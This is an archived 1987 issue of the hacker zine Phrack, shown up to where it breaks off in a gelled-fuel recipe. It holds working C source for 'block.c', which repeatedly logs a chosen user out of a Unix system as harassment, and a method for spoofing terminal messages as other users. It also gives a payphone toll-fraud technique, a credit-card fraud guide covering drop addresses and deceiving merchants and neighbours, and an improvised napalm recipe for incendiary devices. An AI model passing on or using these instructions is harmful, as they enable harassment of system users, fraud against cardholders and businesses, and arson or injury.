home *** CD-ROM | disk | FTP | other *** search
/ Freaks Macintosh Archive / Freaks Macintosh Archive.bin / Freaks Macintosh Archives / Textfiles / zines / Phrack / Phrack Issue 15.sit / Phrack Issue 15
Text File  |  1997-02-22  |  69KB  |  1,574 lines

  1. <head>
  2. <title>Phrack Magazine Issue 15, File 1 of 1 </title>
  3. <head>
  4. <body>
  5. <pre>
  6.  
  7.  
  8.                 ===== Phrack Magazine presents Phrack 15 =====
  9.  
  10.                   ===== File 1 of 8 : Phrack 15 Intro =====
  11.  
  12.  
  13.  
  14. 8/7/87
  15.  
  16.  
  17.         So, did you miss us?  Yes, Phrack is back!  Phrack Magazine's beloved
  18. founders, Taran King and Knight Lightning, have gone off to college, and the
  19. recent busts (summarized completely in this month's Phrack World News) have
  20. made it difficult to keep the magazine going.
  21.  
  22.         TK and KL have put the editorship of Phrack in the hands of Elric of
  23. Imrryr and Sir Francis Drake.  SFD is primarily responsible for PWN.  As of
  24. yet we have no 'Official Phrack BBS.'
  25.  
  26.         Due to various obstacles, the first issue under the new editorship is
  27. rather small.  Fortunately, however, the overall quality of the files
  28. presented is among the highest ever.  We've managed to keep references to
  29. Oryan QUEST down to as little as possible and we've resisted the temptation to
  30. include some second-rate files as "fillers."  Naturally, we're still looking
  31. for excellent, unpublished phreak/hack/pyro/anarchy files to publish in Phrack
  32. XVI and beyond.  If you have an article, we'd like to see it! Get in touch
  33. with SFD or Elric when your file is ready for submission.
  34.  
  35.                                           -- Shooting Shark
  36.                                              Contributing Editor
  37. Note:  For now you can contact Phrack Inc. at:
  38. Lunatic Labs: 415-278-7421 300/1200 (Sir Francis Drake or Elric of Imrryr)
  39. Free World:   301-668-7657 300/1200/2400/9600 (Disk Jockey)
  40.  
  41.  
  42. Phrack XV Table of Contents
  43. ===========================
  44.  
  45. 15-1.   Phrack XV Intro by Shooting Shark                (2K)
  46. 15-2.   More Stupid Unix Tricks by Shooting Shark        (10K)
  47. 15-3.   Making Free Local Payfone Calls by Killer Smurf  (7K)
  48. 15-4.   Advanced Carding XIV by The Disk Jockey          (12K)
  49. 15-5.   Gelled Flame Fuels by Elric of Imrryr            (12K)
  50. 15-6.   PWN I:   The Scoop on Dan The Operator by KL     (19K)
  51. 15-7.   PWN II:  The July Busts by Knight Lightning      (21K)
  52. 15-8.   PWN III: The Affidavit by SFD                    (6K)
  53.  
  54.                 ===== Phrack Magazine presents Phrack 15 =====
  55.  
  56.                            ===== File 2 of 8 =====
  57.  
  58. I thought I had written everything there is to write about the Unix operating
  59. system until I was recently asked to put out yet another file... so I said
  60. "I'll try, but don't publish my file along with an article by The Radical
  61. Rocker this time!"  These demands having been met, I booted up the PC and
  62. threw together...
  63.  
  64.                  --- ---- ---- ------ ------ -- -- ---- -----
  65.                % Yet Even More Stupid Things to Do With Unix! $
  66.                  --- ---- ---- ------ ------ -- -- ---- -----
  67.  
  68.                               By Shooting Shark.
  69.                           Submitted August 26, 1987
  70.  
  71.  
  72. These two topics are methods of annoying other users of the system and
  73. generally being a pest.  But would you want to see a file on *constructive*
  74. things to do with Unix?  Didn't think so...
  75.  
  76.  
  77. --  ------- ----- --- --- ------
  78. 1.  Keeping Users Off The System
  79. --  ------- ----- --- --- ------
  80.  
  81. Now, we all know by now how to log users off (one way is to redirect an 'stty
  82. 0' command to their tty) but unless you have root privs, this will not work
  83. when a user has set 'mesg n' and prevented other users from writing to their
  84. terminal.  But even users who have a 'mesg n' command in their .login (or
  85. .profile or .cshrc) file still have a window of vulnerability, the time
  86. between login and the locking of their terminal.  I designed the following
  87. program, block.c, to take advantage of this fact.
  88.  
  89. To get this source running on your favorite Unix system, upload it, call it
  90. 'block.c', and type the following at the % or $ prompt:
  91.  
  92. cc -o block block.c
  93.  
  94. once you've compiled it successfully, it is invoked like so:
  95.  
  96. block username [&]
  97.  
  98. The & is optional and recommended - it runs the program in the background,
  99. thus letting you do other things while it's at work.
  100.  
  101. If the user specified is logged in at present, it immediately logs them out
  102. (if possible) and waits for them to log in.  If they aren't logged in, it
  103. starts waiting for them.  If the user is presently logged in but has their
  104. messages off, you'll have to wait until they've logged out to start the thing
  105. going.
  106.  
  107. Block is essentially an endless loop : it keeps checking for the occurrence of
  108. the username in /etc/utmp.  When it finds it, it immediately logs them out and
  109. continues.  If for some reason the logout attempt fails, the program aborts.
  110. Normally this won't happen - the program is very quick when run unmodified.
  111. However, to get such performance, it runs in a very tight loop and will eat up
  112. a lot of CPU time.  Notice that near the end of the program there is the line:
  113.  
  114. /*sleep(SLEEP)   */
  115.  
  116. the /* and */ are comment delimiters - right now the line is commented out.
  117. If you remove the comments and re-compile the program, it will then 'go to
  118. sleep' for the number of seconds defined in SLEEP (default is 5) at the end of
  119. every loop.  This will save the system load but will slightly decrease the
  120. odds of catching the user during their 'window of vulnerability.'
  121.  
  122. If you have a chance to run this program at a computer lab at a school or
  123. somewhere similar, run this program on a friend (or an enemy) and watch the
  124. reaction on their face when they repeatedly try to log in and are logged out
  125. before they can do *anything*.  It is quite humorous.  This program is also
  126. quite nasty and can make you a lot of enemies!
  127.  
  128. caveat #1:  note that if you run the program on yourself, you will be logged
  129. out, the program will continue to run (depending on the shell you're under)
  130. and you'll have locked yourself out of the system - so don't do this!
  131.  
  132. caveat #2:  I wrote this under OSx version 4.0, which is a licensed version of
  133. Unix which implements 4.3bsd and AT&T sysV.  No guarantees that it will work
  134. on your system.
  135.  
  136. caveat #3:  If you run this program in background, don't forget to kill it
  137. when you're done with it!  (when you invoke it with '&', the shell will give
  138. you a job number, such as '[2] 90125'.  If you want to kill it later in the
  139. same login session, type 'kill %2'.  If you log in later and want to kill it,
  140. type 'kill 90125'.  Just read the man page on the kill command if you need any
  141. help...
  142.  
  143. ----- cut here -----
  144.  
  145. /* block.c -- prevent a user from logging in
  146.  * by Shooting Shark
  147.  * usage : block username [&]
  148.  * I suggest you run this in background.
  149.  */
  150.  
  151. #include <stdio.h>
  152. #include <utmp.h>
  153. #include <ctype.h>
  154. #include <termio.h>
  155. #include <fcntl.h>
  156.  
  157. #define W_OK2
  158. #define SLEEP5
  159. #define UTMP"/etc/utmp"
  160. #define TTY_PRE "/dev/"
  161.  
  162. main(ac,av)
  163. int ac;
  164. char *av[];
  165. {
  166. int target, fp, open();
  167. struct utmpuser;
  168. struct termio*opts;
  169. char buf[30], buf2[50];
  170.  
  171. if (ac != 2) {
  172. printf("usage : %s username\n",av[0]);
  173. exit(-1);
  174. }
  175.  
  176.  
  177. for (;;) {
  178.  
  179. if ((fp = open(UTMP,0)) == -1) {
  180. printf("fatal error!  cannot open %s.\n",UTMP);
  181. exit(-1);
  182. }
  183.  
  184.  
  185. while (read(fp, &user, sizeof user) > 0) {
  186. if (isprint(user.ut_name[0])) {
  187. if (!(strcmp(user.ut_name,av[1]))) {
  188.  
  189. printf("%s is logging in...",user.ut_name);
  190. sprintf(buf,"%s%s",TTY_PRE,user.ut_line);
  191. printf("%s\n",buf);
  192. if (access(buf,W_OK) == -1) {
  193. printf("failed - program aborting.\n");
  194. exit(-1);
  195. }
  196. else {
  197. if ((target = open(buf,O_WRONLY)) != EOF) {
  198. sprintf(buf2,"stty 0 > %s",buf);
  199. system(buf2);
  200. printf("killed.\n");
  201. sleep(10);
  202. }
  203.  
  204. } /* else */
  205. } /* if strcmp */
  206. } /* if isprint */
  207. } /* while */
  208. close(fp);
  209.  
  210. /*sleep(SLEEP);  */
  211.  
  212. } /* for */
  213.  
  214.  
  215.  
  216.  
  217.  
  218. }
  219.  
  220. ----- cut here -----
  221.  
  222.  
  223. --  ------------- ----- ----- ---- ------  --- ------
  224. 2.  Impersonating other users with 'write' and 'talk'
  225. --  ------------- ----- ----- ---- ------  --- ------
  226.  
  227. This next trick wasn't exactly a work of stupefying genius, but is a little
  228. trick (that anybody can do) that I sometimes use to amuse myself and, as with
  229. the above, annoy the hell out of my friends and enemies.
  230.  
  231. Nearly every Unix system has the 'write' program, for conversing with other
  232. logged-in users.  As a quick summary:
  233.  
  234. If you see that user 'clara' is logged in with the 'who' or 'w' command or
  235. whatever, and you wish to talk to her for some reason or another, you'd type
  236. 'write clara'.  Clara then would see on her screen something like this (given
  237. that you are username 'shark'):
  238.  
  239.  
  240. [3 ^G's] Message from shark on ttyi13 at 23:14 ...
  241.  
  242. You then type away at her, and whatever you type is sent to her terminal
  243. line-by-line.  If she wanted to make it a conversation rather than a
  244. monologue, she'd type 'write shark,' you'd get a message similar to the above
  245. on your terminal, and the two of you would type away at each other to your
  246. little heart's content.  If either one of you wanted to end the conversation,
  247. you would type a ^D.  They would then see the characters 'EOF' on their
  248. screen, but they'd still be 'write'ing to you until they typed a ^D as well.
  249.  
  250. Now, if you're on a bigger installation you'll probably have some sort of
  251. full-screen windowing chat program like 'talk'.  My version of talk sends the
  252. following message:
  253.  
  254. Message from Talk_Daemon@tibsys at 23:14 ...
  255. talk: connection requested by shark@tibsys.
  256. talk: respond with:  talk shark@tibsys
  257.  
  258. Anyway, here's where the fun part begins:  It's quite easy to put a sample
  259. 'write' or 'talk' message into a file and then edit so that the 'from' is a
  260. different person, and the tty is listed differently.  If you see that your
  261. dorky friend roger is on ttyi10 and the root also happens to be logged on on
  262. ttyi01, make the file look something like this:
  263.  
  264. [3 control-G's] Message from root on ttyi01 at [the current time]
  265.  
  266. wackawackawackawackawacka!!!
  267.  
  268. [or a similarly confusing or rude message...]
  269.  
  270. EOF
  271.  
  272. Then, send this file to roger's terminal with:
  273.  
  274. cat filename > /dev/ttyi10
  275.  
  276. He'll get the message on his terminal and wonder what the hell the superuser
  277. is talking about.  He might even 'write' back to the superuser with the intent
  278. of asking 'what the hell are you talking about?'.  For maximum effectiveness,
  279. *simultaneously* send a message to root 'from' roger at the appropriate
  280. terminal with an equally strange message - they'll then engage in a
  281. conversation that will go something like "what did you mean by that?"  "what
  282. do you mean, what do I mean?  What did *you* mean by that?" etc.  A splendid
  283. time is guaranteed for all!  Note that you don't have to make 'root' the
  284. perpetrator of the gag, any two currently logged-in users who have their
  285. terminals open for messages can join in on the fun.
  286.  
  287. Similarly, you can fake a few 'talk' pages from/to two people...they will then
  288. probably start talking...although the conversation will be along the lines of
  289. "what do you want?"  "you tell me."  "you paged me, you tell *me." etcetera,
  290. while you laugh yourself silly or something like that.
  291.  
  292. A variation on the theme:  As I said, when using 'write' you type a ^D to end
  293. the conversation, and the person you're typing at sees an 'EOF' on their
  294. screen.  But you could also just *type* 'EOF', and they'd think you've
  295. quit...but you still have an open line to their terminal.  Even if they later
  296. turn messages off, you still have the ability to write to their terminal.
  297. Keeping this fact in mind, anybody who knows what they're doing can write a
  298. program similar to my 'block' program above that doesn't log a user out when
  299. they appear on the system, but opens their tty as a device and keeps the file
  300. handle in memory so you can redirect to their terminal - to write rude
  301. messages or to log them out or whatever - at any time, until they log out.
  302.  
  303. As I said, there was no great amount of genius in the above discourse, but
  304. it's a pastime I enjoy occasionally...
  305.  
  306. -- Shooting Shark
  307.  
  308.  
  309. "the first fact to face is that unix was not developed with security, in any
  310. realistic sense, in mind..."
  311.  
  312. -- Dennis M. Ritchie
  313.  
  314. "Oryan QUEST couldn't hack his way out of a UNIX system, let alone into one."
  315.  
  316. -- Tharrys Ridenow
  317.  
  318.                 ===== Phrack Magazine presents Phrack 15 =====
  319.  
  320.                          ===== File 3 of 8 =====
  321.  
  322. *-+-*-+-*-+-*-+-*-+-*-+-*-+-*-+-*-+-*-+-*-+-*-+-*-+-*-+-*-+-*-+-*-+-*-+-*
  323. *                                                                       *
  324. *            How to "Steal" Local Calls from Most Payphones             *
  325. *                                                                       *
  326. *                            August 25, 1987                            *
  327. *                                                                       *
  328. *                   By Killer Smurf and Pax Daronicus                   *
  329. *                                                                       *
  330. *-+-*-+-*-+-*-+-*-+-*-+-*-+-*-+-*-+-*-+-*-+-*-+-*-+-*-+-*-+-*-+-*-+-*-+-*
  331.  
  332.      Most of you have seen WarGames, right? Remember the part where David
  333. was stranded in Colorado and needed to call his girlfriend in Seattle? We
  334. knew you did.  If you didn't, what David done was unscrew the  mouthpiece
  335. on  the payphone and make some connection between the mouthpiece and  the
  336. phone.  Well... that was pretty close to reality except for two things...
  337. 1> Nowadays,  mouthpieces are un-unscrewable, and 2> You cannot make long
  338. distance  or toll calls using that method.  Maybe that DID work on  older
  339. phones, but you know Ma Bell.  She always has a damn cure for every thing
  340. us Phreaks do.  She glued on the mouthpiece!
  341.  
  342.      Now to make free local calls, you need a  finishing nail.  We highly
  343. recommend "6D E.G. FINISH C/H, 2 INCH" nails.  These are about 3/32 of an
  344. inch  in diameter and 2 inches long (of course).  You also need  a  large
  345. size  paper  clip.  By  large  we  mean they  are  about  2  inches  long
  346. (FOLDED).  Then  you  unfold the paper clip.  Unfold it  by  taking  each
  347. piece  and  moving  it out 90 degrees.  When it is done  it  should  look
  348. somewhat like this:
  349.                              /----------\
  350.                              :          :
  351.                              :          :
  352.                              :          :
  353.                              :          :
  354.                              \-----
  355.  
  356.      Now,  on to the neat stuff.  What you do,  instead of unscrewing the
  357. glued-on  mouthpiece,  is  insert the nail into the center  hole  of  the
  358. mouthpiece  (where you talk) and push it in with pressure or just  hammer
  359. it in by hitting the nail on something.  Just DON'T KILL THE  MOUTHPIECE!
  360. You  could  damage  it if you insert the nail too far or  at  some  weird
  361. angle.  If  this happens then the other party won't be able to hear  what
  362. you say.
  363.      You now have a hole in the mouthpiece in which you can easily insert
  364. the  paper clip.  So, take out the nail and put in the paper  clip.  Then
  365. take  the other end of the paper clip and shove it under the rubber  cord
  366. protector at the bottom of the handset (you know, the blue guy...).  This
  367. should end up looking remotely like...like this:
  368.  
  369.                              /----------\      Mouthpiece
  370.                              :          :      /
  371.              Paper clip -->  :          :     /
  372.                              :      /---:---\
  373.                              :      :   :   :------------>
  374.          ====================\---))):       :  To earpiece ->
  375.                    ^              ^ \-------------------->
  376.                    :              :
  377.                    :              :
  378.                  Cord          Blue guy
  379.  
  380. (The  paper clip is shoved under the blue guy to make a  good  connection
  381. between the inside of the mouthpiece and the metal cord.)
  382.  
  383.      Now,  dial  the number of a local number you wish to  call,  sayyyy,
  384. MCI.  If  everything  goes okay, it should ring and not answer  with  the
  385. "The Call You Have Made Requires a 20 Cent Deposit" recording.  After the
  386. other  end  answers  the phone, remove the  paper  clip.  It's  all  that
  387. simple, see?
  388.  
  389.      There  are  a couple problems,  however.  One  is,  as  we mentioned
  390. earlier, the mouthpiece not working after you punch it.  If this  happens
  391. to you,  simply move on to the next payphone.  The one you are now on  is
  392. lost.  Another problem is that the touch tones won't work when the  paper
  393. clip is in the mouthpiece. There are two ways around this..
  394.      A> Dial the first 6 numbers.  This should be done without the  paper
  395. clip making the connection, i.e., one side should not be connected.  Then
  396. connect  the paper clip,  hold down the last digit,  and slowly pull  the
  397. paper clip out at the mouthpiece's end.
  398.      B> Don't  use  the paper clip at all.  Keep the nail  in  after  you
  399. punch it.  Dial the first 6 digits.  Before dialing the last digit, touch
  400. the nail head to the plate on the main body of the phone,  the money safe
  401. thingy..then press the last number.
  402.  
  403.      The  reason  that this method is sometimes called  clear  boxing  is
  404. because  there is another type of phone which lets you actually make  the
  405. call  and  listen  to  them say "Hello,  hello?"  but  it  cuts  off  the
  406. mouthpiece  so  they can't hear you.  The Clear Box is used  on  that  to
  407. amplify your voice signals and send it through the earpiece.  If you  see
  408. how  this  is even slightly similar to the method we  just  described  up
  409. there, kindly explain it to US!! Cause WE don't GET IT!
  410.  
  411.      Anyways,  this DOES work on almost all single slot,  Dial Tone First
  412. payphones (Pacific Bell for sure).  We do it all the time.  This  is  the
  413. least,  WE STRESS *LEAST*, risky form of Phreaking.  And remember.  There
  414. are other Phreaks like you out there who have read this article and punch
  415. payphones, so look before you punch, and save time.
  416.  
  417.      If  you feel the insane desire to have to contact us to bitch at  us
  418. for  some  really stupid mistake in this article,  you can  reach  us  at
  419. Lunatic Labs Unltd...415/278-7421.  It should be up for quite a while..
  420.  
  421.  
  422.      Also,  if you think of any new ideas that can be used in conjunction
  423. with this method, such as calling a wrong number on purpose and demanding
  424. your quarter back from the 0perator,  tell us!!  Post it on Looney!!  Oh,
  425. and if this only works on Pac Bell phones, tell us also!  Thanks for your
  426. time, upload this to every board you can find.  You may use this material
  427. in any publication - electronic, written, or otherwise without consent of
  428. the authors as long as it is reproduced in whole, with all credit to the
  429. authors (us!) and Lunatic Labs.  And now, the Bullshit:
  430.  
  431. _________________________________________________________________________
  432.  
  433. DISCLAIMER: This  disclaimer disclaims that this article was written  for
  434.             your information only.  Any injuries resulting from this file
  435.             (punctured hands, sex organs, etc.) is NOT OUR FAULT! And  of
  436.             course  if you get really stupidly busted in any way  because
  437.             of this, it ain't our fault either.  You're the dumb ass with
  438.             the  nail.  So, proceed with care, but...  HELL!  Have  fun.
  439.             Later...
  440. _________________________________________________________________________
  441.  
  442.  
  443.                                                                 DINC!
  444.  
  445.                 ===== Phrack Magazine presents Phrack 15 =====
  446.  
  447.                            ===== File 4 of 8 =====
  448.  
  449.  
  450.  
  451.  
  452.  
  453.  
  454.  
  455. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  456. ~                             The Disk Jockey                                ~
  457. ~                                                                            ~
  458. ~                                presents:                                   ~
  459. ~                                                                            ~
  460. ~                          Advanced Carding XIV:                             ~
  461. ~              Clarification of Many Credit Card Misconceptions              ~
  462. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  463.                              (A 2af Presentation)
  464. Preface:
  465. -------
  466.      After reading files that have been put out by various groups and
  467. individuals concerning carding, credit fraud, and the credit system in
  468. general, I am finding more and more that people are basing these files on
  469. ideas, rather than knowing how the system actually works.  In this article I
  470. hope to enlighten you on some of the grey areas that I find most people either
  471. do not clarify, or don't know what they are talking about.  I can safely say
  472. that this will be the most accurate file available dealing with credit fraud.
  473. I have worked for and against credit companies, and know how they work from
  474. the insiders point of view, and I have yet to meet someone in the modem world
  475. that knows it better.
  476.  
  477. This file is dedicated to all the phreaks/hacks that were busted for various
  478. reasons in the summer of 1987.
  479.  
  480.  
  481. Obtaining Cards:
  482. ---------------
  483.      Despite popular belief, there IS a formula for Visa and Mastercard
  484. numbers.  All credit card account numbers are issued by on issuing company, in
  485. this case, Visa or Mastercard.  Although the banks are not aware of any type
  486. of pattern to the account numbers, there IS one that can be found.  I plan to
  487. publish programs in the near future that will use the various formulas for
  488. Visa, Mastercard and American Express to create valid accounts.
  489.  
  490. Accounts:
  491. --------
  492.      All that is needed to successfully use a Visa/MC account is the account
  493. number itself.  I don't know how many times I have gotten into arguments with
  494. people over this, but this is the way it is.  I'll expand on this.
  495.  
  496. First of all, on all Visa/MC cards, the name means NOTHING.  NOTHING AT ALL.
  497. You do not need this name and address of the cardholder to successfully use
  498. the account, at no time during authorization is the name ever needed, and with
  499. over 50,000 banks, credit unions, and various other financial institutions
  500. issuing credit cards, and only 5 major credit verification services, it is
  501. impossible to keep personal data on each cardholder.
  502.  
  503. Ordering something and having it sent with the real cardholder's name is only
  504. going to make things more difficult, at best.  There is no way that you can
  505. tell if the card is a normal card, or a premium (gold) card merely by looking
  506. at the account number.  The only thing that can be told by the account number
  507. is the bank that issued the card, but this again, is not needed.
  508.  
  509. The expiration date means nothing.  Don't believe me?  Call up an
  510. authorization number and check a card and substitute 12/94, and if the account
  511. number is good, the card will pass.  The expiration date is only a binary-type
  512. check to see if the card is good, (Yes/No), it is NOT a checksum-type check
  513. code that has to be matched up to the card account to be valid.
  514.  
  515. Carding Stupid Things:
  516. ---------------------
  517.      Whenever anyone, ANYONE tries to card something for the first time, they
  518. ALWAYS want to get something for their computer.  This is nice and all, but
  519. just think that every person that has ever tried to card has tried to get a
  520. hard drive and a new modem.  Everyone does it, thus every single computer
  521. company out there is aware and watching for that.  If I could give every
  522. single person who ever tries to card one piece of advice, it would be to NEVER
  523. order computer equipment.  I know there are a hundred guys that will argue
  524. with me about it, but common sense should tell you that the merchants are
  525. going to go out of there way to check these cards.
  526.  
  527. Merchant Checking:
  528. -----------------
  529.      Since I brought up merchants checking the cards, I will review the two
  530. basic ways that almost all mail-order merchants use.  Keep these in mind when
  531. designing your name, address and phone number for your drop.
  532.  
  533. The Directory Assistance Cross-Reference:
  534. ----------------------------------------
  535.      This method is most popular because it is cheap, yet effective.  You can
  536. usually tell these types of checks because during the actual order, you are
  537. asked questions such as "What is your HOME telephone number" and your billing
  538. address.  Once they have this information, they can call directory assistance
  539. for your area code, say 312, and ask "May I have the phone number for a Larry
  540. Jerutis at 342 Stonegate Drive?"  Of course, the operator should give a number
  541. that matches up with the one that you gave them as your home number.  If it
  542. doesn't, the merchant knows that something is up.  Even if it is an unlisted
  543. number, the operator will say that there is a Jerutis at that address, but the
  544. telephone number is non-published, which is enough to satisfy the merchant.
  545. If a problem is encountered, the order goes to a special pile that is actually
  546. called and the merchant will talk to the customer directly.  Many merchants
  547. have policy to not ship at all if the customer can not provide a home phone
  548. number that corresponds with the address.
  549.  
  550. The Call Back:
  551. -------------
  552.      This deals with the merchant calling you back to verify the order.  This
  553. does not imply, however, that you can stand by a payphone and wait for them to
  554. call back.  Waiting by a payphone is one of the stupidest things I have ever
  555. heard of, being that few, if any, places other than the pizza place will call
  556. back immediately like that.  What most places will do is process your order,
  557. etc, and then call you, sometimes it's the next day, sometimes that night.  It
  558. is too difficult to predict when they will call back, but if they don't get a
  559. hold of you, or only get a busy, or an answering machine, they won't send the
  560. merchandise until they speak with you voice.  This method is difficult to
  561. defeat, but fortunately, due to the high cost of phone bills, the directory
  562. assistance method is preferred.
  563.  
  564. Billing Address:
  565. ---------------
  566.      This should ALWAYS be the address that you are having the stuff sent to.
  567. One of the most stupidest things that you could do to botch up a carding job
  568. would be to say something like "Well, I don't want it sent to my house, I want
  569. it sent to....", or "Well, this is my wife's card, and her name is....".
  570. These methods may work, but for the most part, only rouse suspicion on you.
  571. If the order sounds pretty straightforward, and there isn't any unusual
  572. situations, it will better the chances of the order going through.
  573.  
  574. Drop Houses:
  575. -----------
  576.      These are getting harder and harder to come by for the reasons that
  577. people are more careful then before, and that UPS is smarter, also.  Your best
  578. bet is to hit somebody that just moved, and I mean JUST moved, being that UPS
  579. will not know that there is nobody at the house anymore if it is within, say,
  580. a week of their moving.  It's getting to the point where in some areas, UPS
  581. won't even leave the stuff on the doorstep, due to liability on their part of
  582. doing that. The old "Leave the stuff in the shrubs while I am at work" note
  583. won't work, most people are smart enough to know that something is odd, and
  584. will more than likely leave the packages with the neighbors before they shove
  585. that hard drive in the bushes.  Many places, such as Cincinnati Microwave
  586. (maker of the Escort and Passport radar detectors) require a signature when
  587. the package is dropped off, making it that much harder.
  588.  
  589. Best Bet:
  590. --------
  591.      Here is the method that I use that seems to work well, despite it being a
  592. little harder to match up names and phone numbers.  Go to an apartment
  593. building and go to the top floor.  The trashier the place, the better.  Knock
  594. on the door and ask if "Bill" is there.  Of course, or at least hopefully,
  595. there will be no Bill at that address.  Look surprised, then say "Well, my
  596. friend Bill gave me this address as being his."  The occupants will again say
  597. "Sorry, but there is no Bill here...".  Then, say that "I just moved here to
  598. go to school, and I had my parents sent me a bunch of stuff for school here,
  599. thinking that this was Bill's place."  They almost always say "Oh Boy...".
  600. Then respond with "Well, if something comes, could you hold on to it for me,
  601. and I will come by in a week and see if anything came?"  They will always say
  602. something to the effect of "Sure, I guess we could do that...".  Thank them a
  603. million times for helping you out, then leave.  A few days after your stuff
  604. comes, drop by and say, "Hi, I'm Jim, did anything come for me?".  If
  605. everything was cool, it should have.  The best thing to do with this is only
  606. order one or two small things, rather than an AT system with an extra monitor.
  607. People feel more comfortable about signing for something small for someone,
  608. rather than something big, being that most people naturally think that the
  609. bigger it is, the more expensive it is.
  610.      This is the best method that I know of, the apartment occupants will
  611. usually sign for the stuff, and be more than happy to help you out.
  612.  
  613. Advice:
  614. ------
  615.      The thing that I can never stress enough is to not become greedy.  Sure,
  616. the first shipment may come in so easy, so risk-free that you feel as if you
  617. can do it forever.  Well, you can't.  Eventually, if you do it frequently
  618. enough, you will become the subject of a major investigation by the local
  619. authorities if this becomes a real habit.  Despite anything that anyone ever
  620. tells you about the police being "stupid and ignorant", you better reconsider.
  621. The police force is a VERY efficient organization once they have an idea as to
  622. who is committing these crimes.  They have the time and the money to catch
  623. you.
  624.  
  625. Don't do it with friends.  Don't even TELL friends that you are doing it. This
  626. is the most stupid, dangerous thing that you could do.  First of all, I don't
  627. care how good of friends anyone may be, but if a time came that you hated each
  628. other, this incident could be very bad for you.  What could be even worse is a
  629. most common scenario:  You and a friend get a bunch of stuff, very
  630. successfully.  You tell a few friends at school, either you or him have to
  631. tell only one person and it gets all over.  Anyways, there is ALWAYS some type
  632. of informant in every high-school.  Be it a teacher, son or daughter of a cop,
  633. or whatever, there is always a leak in every high school.  The police decide
  634. to investigate, and find that it is becoming common knowledge that you and/or
  635. your friend have ways of getting stuff for "free" via the computer.  Upon
  636. investigation, they call in your friend, and tell him that they have enough
  637. evidence to put out a warrant for his arrest, and that they might be able to
  638. make a deal with him.  If he gives a complete confession, and be willing to
  639. testify against your in court, they will let him off with only paying the
  640. restitution (paying for the stuff you got).  Of course, just about anyone is
  641. going to think about themselves, which is understandable, and you will get the
  642. raw end of the deal.  Don't let anyone ever tell you that as a minor, you
  643. won't get in any trouble, because you can and will.  If you are really
  644. uncooperative, they may have you tried as an adult, which would really put you
  645. up the creek, and even as a juvenile, you are eligible to receive probation,
  646. fines, court costs, and just about anything else the judge wants to do with
  647. you.  All this boils down to is to not tell anyone anything, and try not to do
  648. it with anyone.
  649.  
  650.  
  651. Well, that should about wrap up this file.  I hope this clears up some
  652. misconceptions about carding.  I am on many boards, and am always open to any
  653. comments/suggestions/threats that anyone might have.  I can always be reached
  654. on The Free World II (301-668-7657) or Lunatic Labs (415-278-7421).
  655.  
  656. Good luck.
  657.  
  658.                                                  -The Disk Jockey
  659.  
  660.                 ===== Phrack Magazine presents Phrack 15 =====
  661.  
  662.                          ===== File 5 of 8 =====
  663.  
  664.  
  665.  
  666.  
  667.  
  668.  
  669.  
  670.  
  671.  
  672.  
  673.                         GELLED FLAME FUELS
  674.                         ------------------
  675.  
  676.         A text phile typed by Elric of Imrryr from the book:
  677.         Improvised Munitions Handbook (TM 31-210), published
  678.         by the Dept of the Army, 1969.
  679.         All information is provided only for information purposes
  680.         only. Construction and/or use may violate local, state, and/or
  681.         federal laws. (Unless your name is Ollie North)
  682.  
  683.  
  684.  
  685.         Gelled or paste type fuels are often preferable to raw gasoline for
  686. use in incendiary devices such as fire bottles.  This type fuel adheres more
  687. readily to the target and produces greater heat concentration.
  688.  
  689.         Several methods are shown for gelling gasoline using commonly
  690. available materials.  The methods are divided into the following categories
  691. based on the major ingredient:
  692.  
  693.                 1. Lye Systems
  694.  
  695.                 2. Lye-Alcohol Systems
  696.  
  697.                 3. Soap-Alcohol Systems
  698.  
  699.                 4. Egg White Systems
  700.  
  701.                 6. Wax Systems
  702.  
  703.  
  704.  
  705.  
  706.  
  707.  
  708.  
  709.  
  710.  
  711.  
  712.  
  713.  
  714.  
  715.  
  716.  
  717.  
  718.  
  719.  
  720.  
  721.  
  722.  
  723.  
  724.  
  725.  
  726.  
  727.  
  728.  
  729.                                    Lye Systems
  730.  
  731.     Lye (also know as caustic soda or Sodium Hydroxide) can be used in
  732. combination with powdered rosin or castor oil to gel gasoline for use as a
  733. flame fuel which will adhere to target surfaces.
  734.  
  735.  
  736.  
  737.  
  738.  
  739. MATERIALS REQUIRED:
  740. ------------------
  741.  
  742. Parts by Volume   Ingredient    How Used         Common Source
  743. ---------------   ----------    --------         -------------
  744.  
  745. 60                Gasoline      Motor Fuel       Gas station or motor vehicle
  746.  
  747. 2 (flake) or      Lye           Drain cleaner,   Food store or Drug store
  748. 1 (powder)                      making of soap
  749.  
  750. 15                Rosin         Manufacturing    Paint store, chemical supply
  751.                                 Paint & Varnish  house
  752.  
  753.                   or
  754.  
  755.                   Castor Oil    Medicine         Food and Drug stores
  756.  
  757.  
  758. PROCEDURE
  759. ---------
  760.  
  761. ______________________________________________________________________________
  762. |CAUTION:  Make sure that there are no open flames in the area when mixing   |
  763. |the flame fuel.  NO SMOKING!                                                |
  764. |----------------------------------------------------------------------------|
  765.  
  766. 1. Pour gasoline into jar, bottle or other container. (DO NOT USE AN ALUMINUM
  767.    CONTAINER.)
  768.  
  769. 2. IF rosin is in cake form, crush into small pieces.
  770.  
  771. 3. Add rosin or castor oil to the gasoline and stir for about five minutes to
  772.    mix thoroughly.
  773.  
  774. 4. In a second container (NOT ALUMINUM) add lye to an equal volume of water
  775.    slowly with stirring.
  776.  
  777. ______________________________________________________________________________
  778. |CAUTION:  Lye solution can burn skin and destroy clothing.  If any is       |
  779. |spilled, wash away immediately with large quantities of water.              |
  780. |----------------------------------------------------------------------------|
  781.  
  782. 5. Add lye solution to the gasoline mix and stir until mixture thickens (about
  783.    one minute).
  784.  
  785. NOTE:  The sample will eventually thicken to a very firm paste.  This can be
  786.        thinned, if desired, by stirring in additional gasoline.
  787.  
  788.  
  789.  
  790.  
  791.  
  792.  
  793.                                    Lye-Alcohol Systems
  794.  
  795.     Lye (also know as caustic soda or Sodium Hydroxide) can be used in
  796. combination with alcohol and any of several fats to gel gasoline for use as a
  797. flame fuel.
  798.  
  799.  
  800.  
  801.  
  802.  
  803. MATERIALS REQUIRED:
  804. ------------------
  805.  
  806. Parts by Volume   Ingredient    How Used         Common Source
  807. ---------------   ----------    --------         -------------
  808.  
  809. 60                Gasoline      Motor Fuel       Gas station or motor vehicle
  810.  
